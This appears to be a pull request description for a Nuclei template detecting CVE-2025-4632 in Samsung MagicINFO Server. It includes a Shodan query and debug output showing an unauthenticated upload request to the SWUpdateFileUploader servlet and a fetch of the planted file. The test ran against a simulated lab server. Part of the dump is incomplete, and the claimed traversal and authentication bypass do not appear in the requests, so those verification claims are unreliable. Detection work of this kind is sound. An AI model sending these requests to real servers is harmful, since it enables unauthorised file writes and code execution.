Template / PR Information

• Added CVE-2025-4632: Samsung MagicINFO Server Remote Code Execution (RCE) vulnerability.
• Included traversal explanation and proper http: syntax in the template.
• References:
  • Rapid7 Advisory / POC
  • MITRE CVE Record

Template Validation

I’ve validated this template locally?

• YES
• NO

Additional Details

• Shodan Query: http.title:"MagicINFO"
• Tested against local MagicINFO vulnerable lab with Docker.
• Template verified to detect the path traversal + RCE injection correctly.

Below is the debug output from local validation (simulated vulnerable lab target):

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.8

                projectdiscovery.io

[INF] Current nuclei version: v3.4.8 (latest)
[INF] Current nuclei-templates version: v10.2.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 55
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-4632] Dumped HTTP request for http://127.0.0.1:7001/MagicInfo/servlet/SWUpdateFileUploader?filename=jX3gyg.txt

POST /MagicInfo/servlet/SWUpdateFileUploader?filename=jX3gyg.txt HTTP/1.1
Host: 127.0.0.1:7001
User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/113.0 Safari/537.36
Connection: close
Content-Length: 25
Content-Type: application/octet-stream
Accept-Encoding: gzip

Date: Thu, 21 Aug 2025 21:35:00 GMT
Server: Werkzeug/3.1.3 Python/3.11.13

{"filename":"jX3gyg.txt","marker":"poc-1755812100-8f72f95f5cf2.json","status":"simulated-write"}
[CVE-2025-4632:status-1] [http] [critical] http://127.0.0.1:7001/MagicInfo/servlet/SWUpdateFileUploader?filename=jX3gyg.txt
[INF] [CVE-2025-4632] Dumped HTTP request for http://127.0.0.1:7001/MagicInfo/jX3gyg.txt

GET /MagicInfo/jX3gyg.txt HTTP/1.1
Host: 127.0.0.1:7001
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2025-4632] Dumped HTTP response http://127.0.0.1:7001/MagicInfo/jX3gyg.txt

HTTP/1.1 200 OK
Connection: close
Content-Length: 25
Content-Type: text/plain; charset=utf-8
Date: Thu, 21 Aug 2025 21:35:00 GMT
Server: Werkzeug/3.1.3 Python/3.11.13

NUCLEI-CVE-2025-4632-TEST
[CVE-2025-4632:word-1] [http] [critical] http://127.0.0.1:7001/MagicInfo/jX3gyg.txt
[CVE-2025-4632:status-2] [http] [critical] http://127.0.0.1:7001/MagicInfo/jX3gyg.txt
[INF] Scan completed in 206.5402ms. 3 matches found.

/claim #12946

✅ Matches confirm successful authentication bypass, directory traversal exploitation, and remote file upload verification.

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server